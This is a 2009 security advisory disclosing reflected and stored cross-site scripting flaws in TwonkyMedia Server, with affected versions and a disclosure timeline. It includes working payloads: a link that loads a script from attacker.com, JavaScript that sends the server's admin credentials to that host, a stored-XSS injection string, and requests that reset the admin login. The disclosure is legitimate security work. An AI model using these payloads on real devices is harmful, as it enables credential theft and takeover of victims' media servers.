|
Brought to you by:
Suppliers of:
|
|
|
| |
| The TwonkyMedia web server fails to adequately sanitize user input (HTTP request strings and form input); thus, an attacker may be able to execute arbitrary script code in a victim's browser. |
| |
Credit:
The information has been provided by Davide Canali.
|
| |
Vulnerable Systems:
* TwonkyMedia Server version 4.4.17 and prior
* TwonkyMedia Server version 5.0.65 and prior
Immune Systems:
* TwonkyMedia Server version 4.4.18
* TwonkyMedia Server version 5.0.66
* TwonkyMedia Server version 5.1
TwonkyMedia Server is bundled on a variety of CE and NAS devices from leading manufacturers, including: Buffalo LinkStation, HP Media Vault, LaCie Ethernet Disk, Philips Streamium music players, Western Digital Share Space.
Two main vulnerabilities have been found.
The TwonkyMedia server IP address, in the following, is just denoted as "twonky".
1st VULNERABILITY:
A HTTP GET request at http://twonky:9000/NON-EXISTENT-PAGE results in a 404 error page containing:
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>/NON-EXISTENT-PAGE was not found on this server.</BODY></HTML>
Thus, an attacker could induce the server administrator (victim) in clicking on a specially crafted link, pointing to:
http://twonky:9000/fake_config_page<script type="text/javascript"
src="http://attacker.com/malicious.js" ></script>
Clicking this link, the victim loads and executes the attacker's script.
An example of this script can be:
xmlhttp=new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if(xmlhttp.readyState==4)
{
document.location="http://attacker.com/get.php?data="+escape(xmlhttp.responseText);
}
}
xmlhttp.open("GET","/rpc/get_all",true);
xmlhttp.send(null);
This script allows the attacker to read all the server configuration variables, including the administrator's username and password.
(The victim, if not already logged on the twonky media server configuration panel, is asked for username and password)
2nd VULNERABILITY:
Form inputs are not well validated, so an attacker can even run a Stored Cross-Site Scripting. Most of the pages of the management interface are vulnerable.
As an example, writing the following string in one of the "Content Locations" fields in the "Sharing" setup page results in a Stored XSS, which can be exploited by a malicious user every time the victim visits the config page, once infected:
Directory" /><script> alert('stored!');</script><br
In this way, the page can arbitrarily and permanently be modified by an attacker, who can inject any kind of content in it.
In addition, leveraging one of these vulnerabilities, an attacker can modify any server configuration parameter. As an example, to modify the administrator username and password once the victim visits the page, it is sufficient to include a script that sends 2 requests at:
http://twonky:9000/rpc/set_option?accessuser=NEWUSER
http://twonky:9000/rpc/set_option?accesspwd=NEWPASSWORD
Disclosure Timeline:
2009-06-01: Vendor notified
2009-06-08: Vendor response
2009-06-10: Status update from the development team
2009-06-10: Sent email stating that I'll publish the advisory once new versions are released
2009-10-06: New releases checked; 2nd vulnerability was not fixed. Vendor notified
2009-10-21: No response received; release of this advisory
|
|
|
|
|
